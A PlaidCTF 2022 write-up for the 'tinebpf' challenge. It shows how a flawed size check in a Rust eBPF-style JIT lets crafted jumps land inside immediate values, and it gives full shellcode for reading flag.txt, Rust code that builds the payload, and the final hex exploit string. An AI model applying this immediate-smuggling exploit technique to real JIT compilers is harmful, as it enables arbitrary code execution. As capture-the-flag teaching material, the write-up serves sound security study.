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PlaidCTF 2022: tinebpf

Participant: Robert Obkircher


TL;DR / Short Summary

We are given the source code of a rust program that reads hex encoded eBPF like instructions, jit compiles them into x86_64 machine code and executes it. The instructions themselves can't do anything interesting, but there is a bug in the calculation of the jump offsets which allows us to jump into an immediate value and execute arbitrary machine code.

Task Description


Take a byte out of every pretty fun snack available here. We made these to help us improve our scrutiny of the messages flying around the Plaidiverse. 1337

The title, image and task description all referenced eBPF, which is a virtual machine to run sandboxed just-in-time compiled programs in a priviledged context such as the operating system kernel. 123

The handout (tinebpf.*.tgz) contained the follwing files that are also included in this repository:

  • Modified: Cargo.lock, Cargo.toml, src/
  • Unmodified: docker-compose.yml, Dockerfile, flag.txt, target/debug/tinebpf, xinetd.conf

Analysis Steps

Initial steps:

  1. Install rustup (which includes the package manager cargo) and IntelliJ Idea with the Rust plugin and open the project.

  2. Have a look at the files:

    • The Dockerfile maps flag.txt to /flag.txt
    • docker-compose.yml and xinetd.conf run the program on port 1337.
    • The only two crates (libraries) in Cargo.toml are hex for hex decoding and memmap2 for creating executable pages.
    • is the only rust file
  3. Open and use the Expand All to Level 2 action get an overview:

    • MAXBPFINST = 128: we can send at most this many instructions
    • Machine code related definitions:
      • PROLOGUE: clears all integer registers to zero
      • EPILOGUE: exit syscall
      • enum X86RegT
    • eBPF related definitions
      • enum BpfRegT
      • struct BpfInstT opc, 2 regs, offset, immediate
      • enum BpfClassT: Immediate/Alu/Jump
      • enum BpfModeT: Only BpfImm is supported, no other memory access modes.
      • enum BpfSrcT { BpfX, BpfK }: Not sure what these mean.
      • enum BpfAluOpT, enum BpfJmpOpT: Both have ~12 members
    • impls and macros to produce machine code
    • fn do_jit(b_inst: &[BpfInstT], addrs: &mut [u32], mut outimg: Option<&mut [u8]>) -> Option<usize> This function takes a list of ebpf instructions and returns the size of the generated machine code. The offset of each machine code instruction is written into the mutable addrs slice, which is used to compute the distance of relative jumps. If outimg is provided then the resulting machine code is copied into it.
    • fn verify_jmps(b_inst: &[BpfInstT]) -> Result<(), &str> Iterates over all instructions and makes sure that the jump targets go to a valid instruction. 8 byte immediate loads are encoded as two instructions, so it is only allowed to jump to the first one. The offset of a jump is added to the index of the next instruction.
    • fn parse_raw_bytes(inp: &[u8]) -> Option<Vec<BpfInstT>>: essentially a bitcast
    • fn main(): Reads a line from stdin, trims it, hex decodes it, checks that the size is at most 128 instructions and parses the input into Vec<BpfInstT>. Then verify_jumps is called and addrs[i] is initialized to PROLOGUE.len() + 64 * i. This represents the machine code offset of the ith instruction if every instruction was 64 bytes. Next do_jit is called up to 20 times with mutable addrs, but if it returns the same value in two successive iterations we break out of the loop. If we broke out of the loop do_jit is called one more time to produce a final output image which is then copied into executable memory and executed right after flushing stdout.
  4. Check if there are any obvious mistakes (e.g. in verify_jmps) by reading most of the code. Nothing found.

  5. Create a git repo4.

  6. Move inner part of main into function fn run(insts: &Vec<BpfInstT>).

  7. Google about fuzzing and try cargo-fuzz and afl without success. See Failed Attempts: Fuzzing below.

  8. Write a Rust function to systematically generate all supported instructions (with constant off and imm), write the machine code to a file and call ndisasm to disassemble it. Notice that there are push/pop instructions generated. However, they don't allow us to manipulate the caller stack and that wouldn't help anyway because the epilogue calls system exit.
    Example instruction: BpfInstT { opc: 36, regs: 1, off: 0, imm: 0 }

    00000000  4831C0            xor rax,rax
    0000002A  4D31FF            xor r15,r15
    0000002D  50                push rax
    0000002E  52                push rdx
    0000002F  4989FB            mov r11,rdi
    00000032  31C0              xor eax,eax
    00000034  41F7E3            mul r11d
    00000037  5A                pop rdx
    00000038  4889C7            mov rdi,rax
    0000003B  58                pop rax
    0000003C  B83C000000        mov eax,0x3c
    00000041  0F05              syscall

    Alu operations seem to be 3 bytes, immediates 10 and a jump to itself (offset -1) is always 2 bytes. Jumps are either 2 or 5 bytes, depending on the size of the offset. In x86_64 the jump offset is added to RIP, which contains the address of the next instruction 5.

At this point I gave up because I was too tired after staying up all night I and wanted to try something easier. I went back to this challenge right before the end, but it was already too late. A few days later I tried again:

  1. Look for overflow and indexing bugs. See Failed Attempts: Overflow and indexing bugs
  2. If we have forward and backward jumps it could happen that the size of both jumps oscilates which would result in an invalid jump when the final code is produced. At this point I wasted a lot of time with afl and cargo-fuzz again to try to find such a series of instructions. See Failed Attempts: Fuzzing below.
  3. Try to find growing/shrinking instructions by looking at the function code() and at machine code: Shrinking was trivial, but I couldn't come up with anything that grew. I noticed that jumps with offset 0 are size zero, but there is no way to change the offset.
  4. Write code that prints a histogram of instruction sizes: The largest one was only 25 bytes, which is not enough to match the 64 bytes in the first iteration. This means we have to find instructions that change size.


The offset computation of forward and backward jumps differs because addrs is updated in place. Forward jumps always use both offsets from the previous iteration. Backward jumps on the other hand observe the new offset of the destination that was computed in the current iteration.

Unconditional jumps are either 2 bytes (8 bit offset) or 5 bytes (32 bit offset). When a backward jump is encoded in 2 bytes it can actually grow to 5 bytes, if the instructions before the target shrink enough. For example:

i1 i2 ... i3 jump to i2 i4

If i1 shrinks from 5 to 2 bytes then i2 moves by 3. The offset for i3 is addrs[i2] - addrs[i4] because jump offsets are added to the address of the next instruction. Since addrs[i4] has not been updated yet this means that a 1 byte offset could turn into a 4 byte offset which would increase the size of i3 by 3 bytes.

I immediately tried to find instructions with oscilating sizes. These were some of my notes:

case f=forward jump s=space b=backward jump i=instruction
1 f1=5 s1 b1=2 i1
2 f2=2 s2 b2=5 i2
transition jump constraint assuming s1=s2
1 -> 2 b1->s2 (3 + s1 + b1) > 128 s >= 124
1 -> 2 f1->i1 (s1 + b1) <= 127 s <= 125
2 -> 1 b2->s1 (-3 + b2 + s2) <= 128 s <= 126
2 -> 1 f2->i2 (s2 + b2) > 127 s >= 123

It follows that 124 <= s <= 125.

Initially I thought that we would start in case 2, but after I implemented this I realized that it would still require an expanding instruction to get there.

The final exploit uses a slightly different pattern which was found with a bit of trial and error. It is described below.

Vulnerabilities / Exploitable Issue(s)

The computation of machine code offsets is iterative because you need to know the size of each instruction to compute jump offsets and you need to know the jump offsets to know whether a jump instruction is 2 or 5 bytes.

The problem is that the check whether a fixed point has been reached only looked at the total size of all instructions. This is incorrect because backward jumps can grow in size and cancel out a shrinking instruction.

Wrong offsets in machine code allow us to jump into an immediate and execute arbitrary code.


We know from the Dockerfile that the flag is in a file. The following assembly code can read it and write it to stdout using linux system calls 6:


; NOTE: instructions must be <= 6 bytes and relative jumps are not supported
; preconditions:
;   rax, rbx contain "flag.txt\0"

    mov     [rsp], rax
    mov     [rsp+8], rbx

    mov     rdi, rsp   ; const char *filename
    xor     rsi, rsi   ; int flags
    xor     rdx, rdx   ; int mode
    mov     rax, 2     ; sys_open
    syscall            ; returns file descriptor

    mov     rdi, rax   ; unsigned int fd
    mov     rsi, rsp   ; char *buf
    mov     rdx, 100   ; size_t count
    xor     rax, rax   ; sys_read
    syscall            ; returns number of bytes read

    mov     rdi, 1     ; unsigned int fd = stdout
    mov     rsi, rsp   ; const char *buf
    mov     rdx, rax   ; size_t count
    mov     rax, 1     ; sys_write

Assemble it with nasm and parse the offset of each instruction from the output of ndisasm:

struct MachineCodeInstructions {
    code: Vec<u8>,
    offsets: Vec<usize>,
    sizes: Vec<usize>,

impl MachineCodeInstructions {
    fn nth(&self, index: usize) -> Option<&[u8]> {
        self.offsets.get(index).map(|&offset| {
            &self.code[offset..offset + self.sizes[index]]

fn assemble_payload(assembly: &Path, machine_code: &Path, disassembly: &Path) -> MachineCodeInstructions {
    let nasm = Command::new("nasm")
        .args(["-f", "bin", "-o"])

    let ndisasm = Command::new("ndisasm")
        .args(["-b", "64"])

    let out_string = String::from_utf8(ndisasm.stdout).unwrap();
    std::fs::write(disassembly, &out_string).unwrap();

    // NOTE: Contents look like this:
    // 00000000  48B8666C61672E74  mov rax,0x7478742e67616c66
    //          -7874
    // 0000000A  48890424          mov [rsp],rax
    let mut offsets = vec![];
    for line in out_string.lines() {
        if let Some(c) = line.chars().next() {
            if c.is_digit(16) {
                let offset = line.split_whitespace().next().unwrap();
                let offset = usize::from_str_radix(offset, 16).unwrap();

    let code = std::fs::read(machine_code).unwrap();

    let mut sizes = vec![];
    for i in 0..offsets.len() {
        let start = offsets[i];
        let end = offsets.get(i + 1).cloned().unwrap_or(code.len());
        sizes.push(end - start);

    MachineCodeInstructions { code, offsets, sizes }

In the initial version of the exploit there was a limited number of immediates that could contain machine code, so I combined small instructions to a max size of 6 bytes:

impl MachineCodeInstructions {
    fn combine(&mut self, max: usize) {
        let mut offsets = vec![];
        let mut sizes = vec![];
        for (&offset, &size) in self.offsets.iter().zip(&self.sizes) {
            match sizes.last_mut() {
                Some(last) if *last + size <= max => *last += size,
                _ => {
        self.offsets = offsets;
        self.sizes = sizes;

Each immediate is 8 bytes, but we use 2 of them to jump to the next immediate:

fn encode_immediate(machine_code: &[u8], jump_offset: u8) -> u64 {
    assert!(machine_code.len() <= 6);

    let mut value = [0x90; 8]; // NOPs
    value[6] = 0xeb; // JMP
    value[7] = jump_offset;


It takes two BpfInstT instructions to load an immediate. This helper function appends them to a list:

fn add_immediate(instructions: &mut Vec<BpfInstT>, reg: BpfRegT, value: u64) {
    // make sure that this will be 8 bytes
    instructions.push(BpfInstT { opc: 0x18, regs: reg as u8, off: 0, imm: value as u32 as i32 });
    instructions.push(BpfInstT { opc: 0, regs: 0, off: 0, imm: (value >> 32) as u32 as i32 });

The follwing function builds the string that we will have to send to the server. First it parses and shrinks our assembly payload. Then it emits two instructions to load flag.txt\0 into R0/rax and R6/rbx The payload is encoded into the immediates. The jumps and padding are explained below. Finaly the instructions are converted to binary with to_raw_bytes, encoded in hex and written to the file exploit.hex. The final step is to telnet to the server and paste in the contents of that file.

fn exploit() {
    let mut payload = assemble_payload(Path::new("payload.asm"), Path::new("payload.machine_code"), Path::new("payload.disasm"));

    let two_bytes = BpfInstT { opc: 5, regs: 0, off: -1, imm: 0 };
    let mut instructions = vec![];

    // store "flag.txt\0" into rax and rbx
    add_immediate(&mut instructions, BpfRegT::R0, u64::from_le_bytes(*b"flag.txt"));
    add_immediate(&mut instructions, BpfRegT::R6, u64::from_le_bytes(*b"\01234567"));

    instructions.push(BpfInstT { opc: 5, regs: 0, off: 4 + 1*2, imm: 0 }); // j6

    instructions.push(BpfInstT { opc: 5, regs: 0, off: 2 + 1 + 11*2 + 2, imm: 0 }); // j3
    instructions.push(BpfInstT { opc: 5, regs: 0, off: 1 + 1 + 11*2 + 5, imm: 0 }); // j4
    instructions.push(BpfInstT { opc: 5, regs: 0, off: 0 + 1 + 11*2 + 7, imm: 0 }); // j5


    // invalid jump goes here:
    //   eb02 jumps 2 bytes forward
    //   cc causes SIGTRAP for debugger
    // add_immediate(&mut instructions, 0x02ebcc_00_00000000);
    add_immediate(&mut instructions, BpfRegT::R0, 0x02eb90_00_00000000);

    // 100 bytes padding with payload
    for i in 0..10 {
        let jump_offset = if i < 9 { 2 } else { 14 * 2 + 2 };
        let immediate = encode_immediate(payload.nth(i).unwrap_or(&[]), jump_offset);
        add_immediate(&mut instructions, BpfRegT::R0, immediate);

    instructions.push(BpfInstT { opc: 5, regs: 0, off: 8 + 1 + 4 + 10*2, imm: 0 }); // j2

    for _ in 0..8 {

    instructions.push(BpfInstT { opc: 5, regs: 0, off: -1 - 8 - 1 - 10*2, imm: 0 }); // j1

    for _ in 0..4 {
        instructions.push(BpfInstT { opc: 5, regs: 0, off: -1, imm: 0 });

    // 100+ bytes padding with payload
    let n = 10 + payload.offsets.len().max(11);
    for i in 10..n {
        let jump_offset = if i < n { 2 } else { 0 };
        let immediate = encode_immediate(payload.nth(i).unwrap_or(&[]), jump_offset);
        add_immediate(&mut instructions, BpfRegT::R0, immediate);

    let bytes = to_raw_bytes(&instructions);
    let mut encoded = hex::encode(bytes);
    std::fs::write("exploit.hex", encoded).unwrap();


The final call to run was only used during development. It contained the core logic of the original main, but with some debug output to show the machine code length of each instruction and the jump offset:

  • olen = total length that is used to check whether to exit the loop
  • ilens: Length of each instruction
    • 10 = immediate
    • (x y) = x byte jump with offset y
    • 2 = dummy
olen 4544
ilens: 10, 10, (5 384), (5 1728), (5 1856), (5 1920), 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, (5 2112), 2, 2, 2, 2, 2, 2, 2, 2, (5 -2572), 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10
nlen 368
ilens: 10, 10, (2 27), (5 129), (5 130), (5 129), 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, (5 129), 2, 2, 2, 2, 2, 2, 2, 2, (5 -129), 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10
nlen 365
ilens: 10, 10, (2 27), (5 129), (5 130), (5 129), 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, (5 129), 2, 2, 2, 2, 2, 2, 2, 2, (2 -126), 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10
nlen 362
ilens: 10, 10, (2 27), (5 129), (5 130), (5 129), 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, (2 126), 2, 2, 2, 2, 2, 2, 2, 2, (2 -123), 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10
nlen 359
ilens: 10, 10, (2 27), (2 126), (2 127), (2 126), 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, (2 126), 2, 2, 2, 2, 2, 2, 2, 2, (5 -129), 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10
nlen 353
ilens: 10, 10, (2 18), (2 120), (2 124), (2 126), 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, (5 129), 2, 2, 2, 2, 2, 2, 2, 2, (2 -123), 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10
nlen 353
flag=true, addrs changed
ilens: 10, 10, (2 18), (2 123), (2 127), (5 129), 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, (2 126), 2, 2, 2, 2, 2, 2, 2, 2, (2 -120), 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10
Running jitted code:

Jumps and targets. All of them are forward except j1:

j6 j3 j4 j5 i1 t6 t1 j2 t3 t4 t5 j1 t2
Iteration Description
1, 2, 3 Because of the way addrs is initialized it takes 3 iterations until j1 is 2 bytes small.
4 This allows j2 to shrink as well.
5 Then j3, j4, and j5 all shrink at the same time which causes j1 to expand.
6 In the final iteration of the loop j2 grows again because it sees the larger j1 from the previous iteration. This is canceled out by j1 which shrinks again.

Even though addrs changed the total code size stayed the same and we break out of the loop. When generating the final image j6 uses the old offset in the addrs array, which incorrectly assumes that j5 is only 2 bytes. Thus j6 ends up 3 bytes too short. That is why the instruction before the target of 6j is an immediate i1 (the commented out cc byte is where we land).

This is what it looked like when I submitted a previous version of exploit.hex where the payload wrote 100 bytes to stdout instead of using the actual file size:

└─$ telnet 1337
Connected to
Escape character is '^]'.
Input: 18000000666c6167000000002e7478741806000000313233000000003435363705001a000000000018000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b705001b000000000005001d000000000005001e00000000000500ffff000000001800000000000000000000000090eb021800000048890424000000009090eb021800000048895c24000000000890eb02180000004889e790000000009090eb0218000000b8020000000000000090eb02180000000f05488900000000c790eb02180000004889e690000000009090eb0218000000ba640000000000000090eb02180000004831c00f000000000590eb0218000000bf010000000000000090eb02180000004889f80f000000000590eb0205002100000000000500ffff000000000500ffff000000000500ffff000000000500ffff000000000500ffff000000000500ffff000000000500ffff000000000500ffff000000000500e2ff0000000018000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b718000000b0b1b2b300000000b4b5b6b70500ffff000000000500ffff000000000500ffff000000000500ffff000000000500ffff000000000500ffff000000000500ffff000000000500ffff00000000
Running jitted code:
��1�4 ��1�4 ��1

Failed Attempts

Overflow and indexing bugs

While reading/skimming the code I thought about many potential logic bugs. Here are two examples:

  1. In the function emit_cond_jump the usage of the macros is_imm8 and is_simm32 seems to be correct, but when joff is computed there is a suspicious cast to i16, even though verify_jumps treats idx and off as i32:

        let joff = addrs[((cidx + 1) as i16 + off) as usize] as i64 - addrs[cidx + 1] as i64;
    • cidx + 1 is in range (0, 128]
    • off is an i16 that is part of the input
    • verify_jumps ensures that their 32 bit sum is in (1, 128]. This means that there is probably no overflow.

    Even if there were an overflow it would not be exploitable, because the Dockerfile copies a debug build, which means that overflow checks are probably enabled.

  2. The match statement in do_jit has 5 patterns that start with BpfJmp. The first 4 simply call emit_cond_jump. At first glance last one seems interesting, because it sets jmpoff to -2 if == -1 and it emits a 2 byte JMP rel8 instruction (relative to the EIP register, which contains the address of following instruction). However this simply avoids one extra iteration until the offset could be computed from addrs. I also checked the opcode bytes of emit_cond_jump, but they seem reasonable.


I tried fuzzing with random instructions to produce invalid jumps, but in hindsight it would have been better to use a more systematic approach first.

I followed the rust fuzzing book. 7 For some reason I couldn't get cargo-fuzz to work (e.g. the timeout parameter was ignored). afl worked but with no results.

Here is some of the code:

use afl::fuzz;

fn main() {
    fuzz!(|data: tinebpf::main::FuzzInput| {

I implemented the Arbitrary trait (interface) to generate random lists of instructions with values that wouldn't instantly cause a crash:

pub struct FuzzInput {
    pub instructions: Vec<BpfInstT>

impl<'a> Arbitrary<'a> for FuzzInput {
    fn arbitrary(u: &mut Unstructured<'a>) -> arbitrary::Result<Self> {
        let len = u.arbitrary_len::<BpfInstT>()? % MAXBPFINST;
        let mut instructions = Vec::with_capacity(len.into());
        for i in 0..len {
            let index = (u16::arbitrary(u)? % (MAXBPFINST as u16 + 1)) as i16; // reduce the possibilities
            let off = index - (i as i16 + 1);
            let imm = i16::arbitrary(u)? as i32; // reduce the possibilities
            let regs = loop {
                let regs = u8::arbitrary(u)?;
                if (regs & 0xf0) > 0x90 || (regs & 0x0f) > 0x09 {
                break regs;
            loop {
                let opc = loop {
                    let opc = u8::arbitrary(u)?;
                    if is_supported(opc) {
                        break opc;
                let inst = BpfInstT {
                    opc: opc as u8,
                    regs: regs as u8,
                if inst.code().is_some() {

The fuzzed function is similar to the core logic of main but it keeps a copy of the addrs and asserts that they didn't change if nlen == olen. I doubt the assertion was triggered, but I'm not even sure because I had trouble interpreting the results.

pub fn fuzz(insts: Vec<BpfInstT>) {
    if verify_jmps(&insts).is_ok() {
        let mut olen = insts.len() * 64;
        let plen = PROLOGUELEN as u32;
        let mut addrs: Vec<u32> = (0..insts.len() + 1).map(|i| plen + 64 * i as u32).collect();
        let mut addrs2: Vec<u32> = addrs.clone();

        for _ in 0..20 {
            if let Some(nlen) = do_jit(&insts, &mut addrs, None) {
                if nlen == olen {
                    if addrs2 != addrs {
                        println!("same length but different!");
                        assert_eq!(addrs2, addrs, "same length but different!");
                olen = nlen;
            } else {

Alternative Solutions

I'm not aware of any alternative solutions.

Lessons Learned

  • Skipping sleep was a bad idea.
  • I think giving up and working on another challenge was the right decision, but maybe I should have asked teammates first.
  • Fuzzing is not an alternative to thinking.
  • Fuzzers were harder to use than I expected.



  1. eBPF:

  2. eBPF:

  3. unofficial eBPF documentation:

  4. git repo:

  5. x86_64 refernece manual:


  7. Rust Fuzz Book, cargo-fuzz, AFL: